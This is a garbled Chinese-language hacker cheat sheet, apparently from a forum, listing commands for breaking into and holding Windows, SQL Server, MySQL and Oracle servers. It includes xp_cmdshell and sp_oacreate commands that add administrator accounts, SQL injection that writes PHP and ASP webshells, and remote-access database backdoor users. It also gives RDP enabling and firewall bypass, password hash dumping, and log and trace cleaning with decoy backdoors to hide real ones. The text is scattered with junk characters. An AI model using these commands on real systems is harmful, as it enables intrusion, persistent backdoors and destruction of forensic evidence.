2 A% g3 N9 n. v6 N) G# e( z7 H& I1.net user administrator /passwordreq:no
7 _1 V7 }. }# X/ C" E9 M这句的意思是"administrator帐号不需要密码",如果可以成功执行的话,3389登陆时administrator的密码就可以留空,直接登陆了,然后进去后再net user administrator /passwordreq:yes恢复就可以了6 V; N. K* X( n8 \9 G2 R5 N
2.比较巧妙的建克隆号的步骤" h! V$ G4 ~: S0 p+ U6 T; c
先建一个user的用户% v. P# W) ~; H$ M+ b
然后导出注册表。然后在计算机管理里删掉
2 [) Y5 p1 r, N1 q" }在导入,在添加为管理员组% K. u* z) }8 \/ p) v: _3 a/ V5 D
3.查radmin密码
2 d; }0 `. j& r/ |( Wreg save HKEY_LOCAL_MACHINE\SYSTEM\RAdmin c:\a.reg* v5 ^3 h Y9 L8 b/ `5 E. h
4.[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Window NT\CurrentVersion\Image File execution options]
* J4 W/ b; D9 [' K& G建立一个"services.exe"的项
% t2 ~( X+ h! m# q) H1 h再在其下面建立(字符串值)( Y( z: z4 l0 k$ w! ^
键值为mu ma的全路径 H& l$ A& u$ a0 r/ `& e: ?, A
5.runas /user:guest cmd8 I! [8 T3 U& q X
测试用户权限!7 u# M0 c& M$ @+ }( P4 Z" b
6.、 tlntadmn config sec = -ntlm exec master.dbo.xp_cmdshell \'tlntadmn config sec = -ntlm\'-- 其实是利用了tlntadmn这个命令。想要详细了解,输入/?看看吧。(这个是需要管理员权限的哦)建立相同用户通过ntml验证就不必我说了吧?5 E0 f+ F4 G5 N( i7 W( d* l
7.入侵后漏洞修补、痕迹清理,后门置放:
2 O+ T a2 a5 z基础漏洞必须修补,如SU提权,SA注入等。DBO注入可以考虑干掉xp_treelist,xp_regread自行记得web目录;你一定要记得清理痕迹~sqlserver连接使用企业管理器连接较好,使用查询分析器会留下记录,位于HKEY_CURRENT_USER\Software \Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers。删除之;IISlog的清除可不要使用AIO类的工具直接完全删除日志~可以选择logcleaner类工具只删除指定IP的访问记录,如果你能gina到管理员密码则通过登陆他清理日志并通过WYWZ进行最后的痕迹清理。话说回来手动清理会比较安全。最后留下一个无日志记录的后门。一句话后门数个,标准后门,cfm后门我一般都不会少。要修改时间的哦~还有一招比较狠滴,如果这个机器只是台普通的肉鸡,放个TXT到管理员桌面吧~提醒他你入侵了,放置了某个后门,添加了某个用户~(当然不是你真正滴重要后门~)要他清理掉。这样你有很大的可能性得以保留你的真实后门
7 m# Y8 p, j% `" ?0 W7 l( G8.declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c# M4 z2 U' g* D$ j; ?2 j
# `- t8 e0 ~% d) A5 ^
for example
' b W1 i) E; g8 C5 ~, O7 S+ j& R, z1 l2 w* w% }. X; Y9 y: Y: e4 H
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user aptime aptime /add'( }. N$ Y2 \* B$ ?# y
- Q; q y5 U; T4 g. `declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrator aptime /add'
' E; v `* t& j
- W o- S3 T0 l( D9:MSSQL SERVER 2005默认把xpcmdshell 给ON了8 [) E1 ~: l: W% m& a0 e1 L% P
如果要启用的话就必须把他加到高级用户模式, a, d' Y8 m! w7 A1 J. W
可以直接在注入点那里直接注入
G5 d- P# F; Q# K' qid=5;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
# Z, i6 n8 I6 [' y1 G/ g' r. L3 w$ a然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll");--) x* D/ _9 I+ h3 d
或者7 N2 L1 W1 H8 P
sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'# ~$ n- c, U2 O+ _( J2 m" X
来恢复cmdshell。
1 d: z5 d: q. w
5 U m2 \: J/ p7 @分析器1 w n. M* N5 r
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
9 i) X9 _( |8 ?5 Y2 K2 o然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll")
3 A5 X n4 h# e5 D& H- A$ F5 X& t( y4 d10.xp_cmdshell新的恢复办法
; V2 e a1 b$ V4 L4 j- _xp_cmdshell新的恢复办法. [. X( h2 r' x S/ H3 _
扩展储存过程被删除以后可以有很简单的办法恢复:+ V& m- V% b9 k% M* t4 R' t0 T- o
删除* Q4 }/ f, Q# x# Q# u D- i) a
drop procedure sp_addextendedproc# L; {/ t1 N+ V% \
drop procedure sp_oacreate1 ~9 E5 C) H% t/ L& w5 @
exec sp_dropextendedproc 'xp_cmdshell'' |2 a: P) i* C! O
; I$ C9 L8 F" m恢复2 i* ~- t2 F" x5 o) N. \
dbcc addextendedproc ("sp_oacreate","odsole70.dll")) W8 ?! M6 |7 S, C% v/ r- o/ W
dbcc addextendedproc ("xp_cmdshell","xplog70.dll")
+ A; E0 x/ X8 w7 `! p( B
; g, T0 g7 y: ~8 t% I. U这样可以直接恢复,不用去管sp_addextendedproc是不是存在! u$ v j/ ]' b* A. d% p
7 S7 g$ h6 b& I------------------------------ d" s1 V# u' E" ]2 @7 {
" j9 g3 L2 x) Z* e# K1 j( X删除扩展存储过过程xp_cmdshell的语句:
( N/ g; L% u3 V& Z0 }1 Yexec sp_dropextendedproc 'xp_cmdshell'0 v+ f6 V- J1 B: k# V9 \) ^
9 I- ]* F% z) L8 [# e恢复cmdshell的sql语句
5 i/ q% m7 h1 E. V- Z1 P3 zexec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll') u- i4 G t* d9 |, ^
! }: ~$ o: @% s a
, ], z2 X' V( p! S; J1 n开启cmdshell的sql语句2 ?& X3 [/ X* v- M0 b: \
/ J' u% w- w9 F2 b3 _: Z
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'4 p" D1 [9 p' F
) [1 h" d2 l5 Y1 W5 u! E
判断存储扩展是否存在
. c* M. i \' a+ [( M) `% aselect count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'- L7 Z; t& t+ E
返回结果为1就ok- v0 w8 X# {7 A# ~/ O
& ?3 a! { E/ Y. ~9 _9 u& ^恢复xp_cmdshell
8 M/ S+ P5 d# bexec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
0 K2 k7 f8 \ e6 L* x( [0 ]返回结果为1就ok
- v2 |! o* y2 ]: H2 ] Y. n: e# C. c6 ]6 I3 v* ]3 l; l. ~
否则上传xplog7.0.dll
7 Z* r. A$ J7 C4 E5 q8 Z6 E3 Oexec master.dbo.addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll'- f5 H" Q) l8 H: n
! K6 V: i5 N/ h; k, R0 Y! {$ }
堵上cmdshell的sql语句1 a8 a0 ]1 A8 J/ V7 K: q7 q
sp_dropextendedproc "xp_cmdshel
% o5 [% n4 G7 a+ A7 B8 C5 }-------------------------8 E4 B1 a V7 u# L7 Q. L
清除3389的登录记录用一条系统自带的命令:
9 I* L6 Z; H% H5 g4 Yreg delete "hkcu\Software\Microsoft\Terminal Server Client" /f
) W# x+ k+ e+ u/ Z) f; N
' M: r5 g- R, D; q然后删除当前帐户的 My Documents 文件夹下的 Default.rdp 文件' U+ y1 e! ~$ X! F* R* v
在 mysql里查看当前用户的权限5 h# t; {% ~+ J
show grants for . g$ F; y1 d# q1 c, m2 Y
4 h$ n8 f n1 B! e1 j以下语句具有和ROOT用户一样的权限。大家在拿站时应该碰到过。root用户的mysql,只可以本地连,对外拒绝连接。以下方法可以帮助你解决这个问题了,下面的语句功能是,建立一个用户为itpro 密码123 权限为和root一样。允许任意主机连接。这样你可以方便进行在本地远程操作数据库了。7 {) l$ {' r! K
* h: O* }9 J% }& x, l
& P- [1 y: W5 m: u% zCreate USER 'itpro'@'%' IDENTIFIED BY '123';5 p/ Q' g! J8 @* a3 _9 o
0 Y! P8 {: W* G- \GRANT ALL PRIVILEGES ON *.* TO 'itpro'@'%' IDENTIFIED BY '123'WITH GRANT OPTION
+ ^# @+ C) I) A5 t) Z2 H Q" \# `+ m3 ^
MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0
7 p. ]( [( l3 E8 W
# o* D! A' z' G/ a9 G+ @4 }MAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;- [% L9 `3 L4 t( X
9 d0 N( j6 m! a; b O4 k
搞完事记得删除脚印哟。
2 d+ K* c# h: |0 c T1 S7 c) C. L8 n- i' |
Drop USER 'itpro'@'%';
1 e( d5 X5 v2 ]* B/ I- K
, @0 J1 d7 N# Z- X" u" n& }& @Drop DATABASE IF EXISTS `itpro` ;, u9 g% o4 j2 w* \# K5 ]0 @5 ?
% e3 z; D. H9 |9 \0 M2 }: w) s当前用户获取system权限: y+ @# t3 n) x$ f' _: X+ v
sc Create SuperCMD binPath= "cmd /K start" type= own type= interact" d) f6 M5 N+ J1 G; \4 ^
sc start SuperCMD
6 z" z% u$ Z. U# F! N程序代码/ O H/ L/ w4 D# X- y
<SCRIPT LANGUAGE="VBScript"># t0 Y! m0 b" T. R* y, n) I
set wsnetwork=CreateObject("WSCRIPT.NETWORK")3 X' a, j, w( Q& h
os="WinNT://"&wsnetwork.ComputerName2 k3 T( k6 o: D. v2 A( t
Set ob=GetObject(os)
* e8 H; ]% U! XSet oe=GetObject(os&"/Administrators,group")$ P9 u1 i2 }/ W: y
Set od=ob.Create("user","nosec"). ^1 o3 u* r4 A3 o2 Y+ B
od.SetPassword "123456abc!@#"
1 [1 h) t6 Y Z5 B' m3 `- pod.SetInfo* P7 Q: Q# P# G; V
Set of=GetObject(os&"/nosec",user)
f3 `+ J5 S$ j0 i) R( koe.add os&"/nosec"5 ~) L1 ?7 e) F/ L ^" ?) ?, Q
</Script>! R h$ `% h, F" s q3 X# J
<script language=javascript>window.close();</script>
$ i d/ n7 }) k/ W
% y4 h1 F9 w5 y) {% ~! U5 J) b! B, |
* i% l, A* O* |+ M7 ]1 h: I
- `8 k, d6 n8 `$ u$ j- h+ F3 R6 D( x! ?) I y' `+ A( z' d) h' W
突破验证码限制入后台拿shell
- J) e: i6 ]0 N( P6 T( n程序代码2 Q2 L3 N0 H+ N( X$ C# l
REGEDIT4 $ t2 K9 T& J5 J6 w/ s
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security] & H" `* ?1 g( v" N0 _
"BlockXBM"=dword:000000004 ]5 I0 m4 ?, {; r# P/ E
2 N% N1 b. t W8 p6 s3 N
保存为code.reg,导入注册表,重器IE
% l: e5 [2 p( S0 }, L* y就可以了
+ p7 A5 t- r- m$ ~, b* runion写马
9 M& i* M. K* w$ r4 o5 b- n7 o, A& \程序代码0 n* _% a1 B7 ~/ W q
www.baidu.com/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,3,4,'<?php%20eval($_POST[cmd])?>',6+into+outfile+'D:\\wwwroot\\duizhang.php'+/*
% L0 _' L# v- Y7 v' T+ s0 @' z9 {* h8 N) {7 P& }& D5 a: ]
应用在dedecms注射漏洞上,无后台写马 G1 v0 r w/ B7 ~3 K0 f
dedecms后台,无文件管理器,没有outfile权限的时候
, D K: b) d8 K' h% ~在插件管理-病毒扫描里$ w- y" j+ r7 p
写一句话进include/config_hand.php里
) w2 A3 O; L! J7 ~ w程序代码( ^- ?$ j& X7 T% K/ w0 I& [" i
>';?><?php @eval($_POST[cmd]);?>
" c% a. M0 q2 U5 |
% V3 p" ?, W& j* B1 F' x* u
& M. W' @, v+ D, Y$ }: N" O" C9 k如上格式
( u# W1 Q: v) S3 c8 p5 u' N N1 o# f1 D& X U' c
oracle中用低权限用户登陆后可执行如下语句查询sys等用户hash然后用cain破解
: |) i1 V4 G+ P; \0 b: J' k程序代码/ I5 @1 `6 _7 K* s
select username,password from dba_users;" t5 W" P2 U5 Z. r
0 f" p: T3 j T* `' x n7 ~$ O! w+ {- Z) X4 ^. V
mysql远程连接用户/ b6 |( i7 b/ E- D: |* R
程序代码
1 @1 o0 c2 T$ K2 a* W9 ]0 t
5 `$ h# `; q4 M _% U) uCreate USER 'nosec'@'%' IDENTIFIED BY 'fuckme';6 {9 K" A* p$ @1 `6 J( i9 g( [: K
GRANT ALL PRIVILEGES ON *.* TO 'nosec'@'%' IDENTIFIED BY 'fuckme' WITH GRANT OPTION* \; j( T+ I" u) ?: J
MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0- U% g0 I0 T n4 A- J. R7 }2 L, j* y
MAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;/ z# q' H, H( e" a) r2 E* C/ Q
2 N. O+ R: P! U6 g! y+ o0 T5 P
7 `4 k- }* M8 m5 g* S5 k
- q( ]( u: ^7 u, F0 T5 v) T; T
* K% P- g% `8 d1 @echo y |reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0
3 d: }8 X$ h" V* t2 U9 R7 `8 L* `1 u+ h& a' J, w' m% T: C
1.查询终端端口
+ c4 z9 G x& T. K0 }9 C: h; @! c5 D' V, S! _ d, Q2 T9 F8 o5 o% G
xp&2003:REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber
9 R9 p% w& @! a9 {6 n7 M, G
% B6 M$ L0 g7 A C9 j通用:regedit /e tsp.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal server\Wds\rdpwd\Tds\tcp"% Y: b$ p6 K( J5 ^ n) i
type tsp.reg" t, L- y, \$ }7 G3 K$ m8 J" _
' V, F) r6 p6 N$ i. T& m/ Y2.开启XP&2003终端服务
- q7 W/ ]1 F2 I. N0 G
% C) ?# y9 k9 M. q% @
3 Q5 o+ `! R2 Q9 z4 bREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f& ^! v9 ^) W- k+ e* z3 W' n% x
! H4 M" s" e& c' ~( y9 u; y& P! l1 F) W9 H3 h8 V' q
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f2 Z- K6 n; a' g( ]" S
5 k) T- d w' |9 H$ y; ^' ~# ^
3.更改终端端口为20008(0x4E28)* m8 a7 s0 `9 h% d% q- s
" T( N( Q1 x L9 O! }REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f
$ k; _; |, h6 i+ r+ ?! b
) _2 D+ V9 q) _) EREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f
. M2 N$ o. {1 R% g3 U3 t/ V S& |
4.取消xp&2003系统防火墙对终端服务3389端口的限制及IP连接的限制* g5 |+ A2 N4 ` O8 f7 V+ R9 H
0 }' j; L9 M7 _# N! b
REG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabledxpsp2res.dll,-22009 /f# l" ~4 E2 V- Z! d4 g% h: M
8 G% A; f# H- ?: v( ?2 p
, o) D( Z1 W8 G5.开启Win2000的终端,端口为3389(需重启), m8 O. z( J0 f% ^ x/ @/ T& [
$ l" s) e, j% F6 E* R
echo Windows Registry Editor Version 5.00 >2000.reg . t3 w3 b8 l9 C6 t
echo. >>2000.reg/ [6 n! n; W' ^ C8 o
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>2000.reg x; W: O; c) E
echo "Enabled"="0" >>2000.reg
1 S+ G$ g# r& _$ Oecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>2000.reg 3 R! p( [/ ~6 f0 B$ f: @: v
echo "ShutdownWithoutLogon"="0" >>2000.reg * l/ D" M: y# X% ^
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>2000.reg
6 Q/ r$ ?) X0 N: l. Lecho "EnableAdminTSRemote"=dword:00000001 >>2000.reg
6 ~% p: W& t. A- l) [8 x- _echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>2000.reg
) L3 c. \ V `. I2 F4 [$ k: aecho "TSEnabled"=dword:00000001 >>2000.reg ; T+ E4 J3 ^$ U( M# q& ~$ N
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>2000.reg - h: W4 T; S, X" L4 X
echo "Start"=dword:00000002 >>2000.reg $ J$ r0 C# }$ }* t
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>2000.reg
. a8 o: ^& c& `. Q: B- m) cecho "Start"=dword:00000002 >>2000.reg
- E" o2 d3 Y# s; ]; zecho [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>2000.reg
`+ M0 ^: ]% {' z0 L0 {3 kecho "Hotkey"="1" >>2000.reg ) Q0 N; d" d! ~
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>2000.reg * t5 O, K- \# [: n1 @6 B/ J
echo "ortNumber"=dword:00000D3D >>2000.reg : }& j# w3 g3 X( S5 l
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>2000.reg % {+ e! x; @- o# f1 [% E
echo "ortNumber"=dword:00000D3D >>2000.reg! ]4 B$ h- Y$ e6 z
. K, B0 H( K7 b1 s# F6.强行重启Win2000&Win2003系统(执行完最后一条一句后自动重启); s1 E1 ?" N0 v7 ]3 O+ X
: n$ s5 m/ Q0 u8 L- W@ECHO OFF & cd/d %temp% & echo [version] > restart.inf
3 W& P, K! L) u8 U- q3 ]. g8 ~(set inf=InstallHinfSection DefaultInstall)
( u$ O- D9 R" h0 B0 techo signature=$chicago$ >> restart.inf2 p4 C% @$ Q/ N+ C; y3 n
echo [defaultinstall] >> restart.inf. t) G# u& R; `" f9 M- _" K
rundll32 setupapi,%inf% 1 %temp%\restart.inf" ]1 e3 y5 \9 d) t. U0 W
$ w+ `1 H* J$ p" s8 w7 ~9 E8 e
" d3 P0 h) K' O ?: F8 N* O6 ~7.禁用TCP/IP端口筛选 (需重启) p9 G5 K8 N% A; z, i. Y6 [ s
+ M: e3 q' N" W" u# |$ n" I
REG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f2 p+ _: N' ] ~$ [) \
4 t/ }+ E& H& t d& n0 G) c: n
8.终端超出最大连接数时可用下面的命令来连接
% U; r# ~* J) O6 x
4 g5 b% o: i/ v Z+ mmstsc /v:ip:3389 /console
, S. Z7 N# _. t$ w8 q: x( h: g3 A8 ~0 v1 y
( V- ^2 s- a" H+ g) O9.调整NTFS分区权限
: F" {# n$ V4 B0 k5 m
$ L, N$ s/ X) C5 Ucacls c: /e /t /g everyone:F (所有人对c盘都有一切权利), C6 k& E' m1 @5 J7 A
5 X- |. R$ ]2 i& W! |" Q/ dcacls %systemroot%\system32\*.exe /d everyone (拒绝所有人访问system32中exe文件). G4 K: y' R* I$ \8 i: G: n
0 ]* V. N0 ~. Y) d5 a' p. _2 c2 @
------------------------------------------------------+ M- ]6 T" w6 a" H: ?
3389.vbs
; f0 \) O2 y9 H& ?On Error Resume Next
, M' Q% F4 w0 {% A! Rconst HKEY_LOCAL_MACHINE = &H80000002+ |$ X9 K7 I( n
strComputer = ".", v( k4 E1 N6 R; i% W1 Z5 @$ ^
Set StdOut = WScript.StdOut2 l; W3 M5 T- G
Set oreg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_! w+ `2 s7 J+ H6 }' e
strComputer & "\root\default:StdRegProv")
% J* ~ s# U6 W) n: tstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"1 V; d7 R( a: T+ A) {6 K
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
. o; K3 N$ `% i! G2 C5 c9 E5 M# W- HstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"7 ~( m, s+ P/ h/ R+ x
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath: \. I/ ^( B% k& [* R
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
8 r4 J0 ]: R% K( r5 ostrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
5 U9 o! I& Q3 _+ ]/ [strValueName = "fDenyTSConnections"
" i Q( V( a6 C. p7 DdwValue = 0, r( { W+ F" d, V! Z0 } n5 v
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
) r9 o2 j( w. `' v1 |6 z& o A! ^strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
8 T4 I& E: F$ `/ _strValueName = "ortNumber"4 [* i" u9 o& f, Z: U0 N8 M- |* z
dwValue = 3389
8 ^0 x( R8 w, ]! c W0 \% {" qoreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
# c" [( r- F* X; M+ _0 K! c! y4 CstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
8 x2 {$ Q; y; h% V6 y zstrValueName = "ortNumber"
% u; y% F5 e, e- ~' udwValue = 3389 e% K7 T$ w6 K3 ^# c$ ~
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
$ H/ S7 _0 A. i USet R = CreateObject("WScript.Shell")
6 i A$ c; z; GR.run("Shutdown.exe -f -r -t 0") 4 N3 v* \! L: g/ Z$ U
( v' K1 w5 h( l$ U
删除awgina.dll的注册表键值3 B" F+ K' i3 [( J! w
程序代码
2 o& P) G" f, @+ H3 A3 [- ^
5 a# m# f! n$ V/ creg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v GinaDLL /f
1 }) w- S& A9 ?3 T
: V6 I2 l O" \1 [: Z! Y5 L7 D& B6 ?0 ~3 C9 A4 R& Q5 u
( O( h K, S5 }8 u7 A8 W! ]$ x. J" ]- F5 E" K- ]/ S" A
程序代码
. a) c" a7 D# t! D {/ h% uHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\NoLMHash
) x) w: u( E0 U. b9 [) M0 ~3 s5 C7 ~- n
7 P! R4 Z1 d5 x0 Q" f0 P, Z5 s设置为1,关闭LM Hash
% |9 \" k W& `' @8 i4 z
5 x9 F- ]) O2 H: l数据库安全:入侵Oracle数据库常用操作命令: d/ [, U L: U
最近遇到一个使用了Oracle数据库的服务器,在狂学Oracle+请教高手后终于搞到了网站后台管理界面的所有用户密码。我发现Oracle操作起来真是太麻烦,为了兄弟们以后少走些弯路,我把入侵当中必需的命令整理出来。" i p9 [4 x' u2 N
1、su – oracle 不是必需,适合于没有DBA密码时使用,可以不用密码来进入sqlplus界面。9 Z1 d, f; q1 H) M
2、sqlplus /nolog 或sqlplus system/manager 或./sqlplus system/manager@ora9i;
) O' w7 E2 w7 Y& n- U, x1 c3、SQL>connect / as sysdba ;(as sysoper)或# u( u0 T# H0 N4 ^! B( y, L; s9 r; p
connect internal/oracle AS SYSDBA ;(scott/tiger)
6 u7 u d! @( y fconn sys/change_on_install as sysdba;- I! C( S2 R2 }- o( E7 \/ o
4、SQL>startup; 启动数据库实例
. A% y. X$ ?- b/ Z L/ Q0 W5、查看当前的所有数据库: select * from v$database;4 j: `5 C/ S$ P. K; \
select name from v$database;
; i2 o* y9 _: O6、desc v$databases; 查看数据库结构字段
* k4 B+ m2 U2 z' I( ]2 n1 f7、怎样查看哪些用户拥有SYSDBA、SYSOPER权限:+ p0 e" h, |/ K2 F* B) f) I0 b
SQL>select * from V_$PWFILE_USERS;
8 r/ ~ |; K; K3 \" U. |% kShow user;查看当前数据库连接用户9 G ?3 X* W, u" c9 X8 {5 T% n
8、进入test数据库:database test;
' C9 ]* ?& V. s6 G; ~/ R9、查看所有的数据库实例:select * from v$instance;1 }' _3 y% i9 Z
如:ora9i
! T( [! G; C @9 Y10、查看当前库的所有数据表:
7 o1 Y: C# W; _$ \, v& n* ySQL> select TABLE_NAME from all_tables;/ O5 N. Z7 M: q& d# w
select * from all_tables;
$ ?7 X3 K4 j% H/ l' g' O1 B1 g" hSQL> select table_name from all_tables where table_name like '%u%';
5 w, d: s3 I4 ~3 _TABLE_NAME( C F1 g, Q9 x! `
------------------------------
7 m2 c$ R I# x8 y_default_auditing_options_
- k8 e; Q5 C( h! O9 i/ S1 b11、查看表结构:desc all_tables;
$ O$ Z& @. [( k D1 a- X12、显示CQI.T_BBS_XUSER的所有字段结构: w8 I, |" J$ q2 J- e% a
desc CQI.T_BBS_XUSER;
J6 j4 c6 J/ `6 y4 @) d13、获得CQI.T_BBS_XUSER表中的记录:
4 r( t q. K# t2 l8 hselect * from CQI.T_BBS_XUSER;
. G7 B$ A! ^# k14、增加数据库用户:(test11/test)3 u# R2 Q/ r8 ?( {' r* T! M
create user test11 identified by test default tablespace users Temporary TABLESPACE Temp;. B2 ?4 A4 g8 U$ |
15、用户授权:
8 x. M/ w1 r8 G. E% b* S9 Egrant connect,resource,dba to test11;7 ?/ x/ C6 w& h3 Y
grant sysdba to test11;
- H) }9 p% o3 u# ~ Wcommit;
: i; J" [( _8 X* I16、更改数据库用户的密码:(将sys与system的密码改为test.)$ f! S" i, C* ]# e, V+ M
alter user sys indentified by test;
/ a8 @+ K3 s) Y/ f) @" ]- q& S- v* ^( |alter user system indentified by test;
# f9 y! s- @4 ]( ~# `
3 I" r& \- l) t& Z- L' G) KapplicationContext-util.xml7 P& v2 T! F; a& c6 {3 a
applicationContext.xml8 D4 O) I7 }$ v2 ^2 F6 o, Z
struts-config.xml
' A% p- F( R; Z9 G8 Z/ q9 {: R# tweb.xml
( A2 k8 A8 }5 r8 e" v6 }2 oserver.xml
/ X. T8 @3 c1 _$ v) ^) Ktomcat-users.xml, \0 w! V. K* }0 V0 Z
hibernate.cfg.xml! N! u, y& D7 n. S1 r
database_pool_config.xml
' r$ Z# l3 N5 q! d4 J% g) n9 I D% {" [ `) X7 y$ o' r7 z4 a7 ?
0 j! h# s: z2 x\WEB-INF\classes\hibernate.cfg.xml 数据库连接配置
% \) N0 Y& I" R' w- P0 e\WEB-INF\server.xml 类似http.conf+mysql.ini+php.ini
. l6 }7 c% X& u2 K2 J4 e; G\WEB-INF\struts-config.xml 文件目录结构
3 u+ B; @. r2 G" X( A( d; u: r" W$ M/ R. l9 b0 U
spring.properties 里边包含hibernate.cfg.xml的名称
. q8 U L: F1 }" e) _% H: ?1 D4 z
# L% a$ ~2 W2 X7 uC:\Program Files\Apache Software Foundation\Tomcat 5.5\conf\tomcat-users.xml
: ]- b+ r$ D3 Y2 a
- z6 y% e3 g# @" J& s0 [# m如果都找不到 那就看看class文件吧。。$ @( M+ H+ Z/ |4 [$ j; Y
) G, V0 t& k( O( A9 C
测试1:! Z m/ p0 k2 F: ~+ A, [
SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1
& }5 l& P4 f4 K# A+ j: {* Q
8 p# n0 [+ z5 B; e- ]5 H测试2:
# H( Z! w; J% M/ S0 a
( j+ Y/ ~$ @$ \( [create table dirs(paths varchar(100),paths1 varchar(100), id int)
9 j- ?* m: v4 K& ~ s d( L0 r8 ^4 r+ w/ e/ g' n. F
delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--
D& i9 K1 E0 O- S0 R. b3 v. [+ r1 t* B% |$ g8 \7 o
SELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1
+ }3 ~9 E( o( [% ?! Y( W) F4 r% `3 }. u/ ]; X
查看虚拟机中的共享文件:8 [4 I6 c. F1 w9 Q7 A1 {8 u
在虚拟机中的cmd中执行! K8 K% ~, ?) M: w/ b4 P6 U |
\\.host\Shared Folders0 i5 O( B" {: W- `: y) T5 n& B
2 i; h. L+ g( Zcmdshell下找终端的技巧 u% i" A1 T& D2 h
找终端:
2 S' b1 E- Z( R. Z" o1 I% D第一步: Tasklist/SVC 列出所有进程,系统服务及其对应的PID值! 5 E+ A( }& _9 }. j" f3 p
而终端所对应的服务名为:TermService : B! i& j+ E' L8 u k$ T
第二步:用netstat -ano命令,列出所有端口对应的PID值! % [7 V9 m/ S! F4 j: ^7 c6 V |
找到PID值所对应的端口, e* ~' y8 o( t: E& g% [; {
; J( L/ k' D% w, Q/ k* a0 I查询sql server 2005中的密码hash
/ G% Q& F9 H+ I9 e( gSELECT password_hash FROM sys.sql_logins where name='sa'/ M f3 s/ a& E" a
SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a( V3 v& u- G: }7 ~; r2 N
access中导出shell# }( }8 O h5 Z U
% a& f- k, T3 N) O
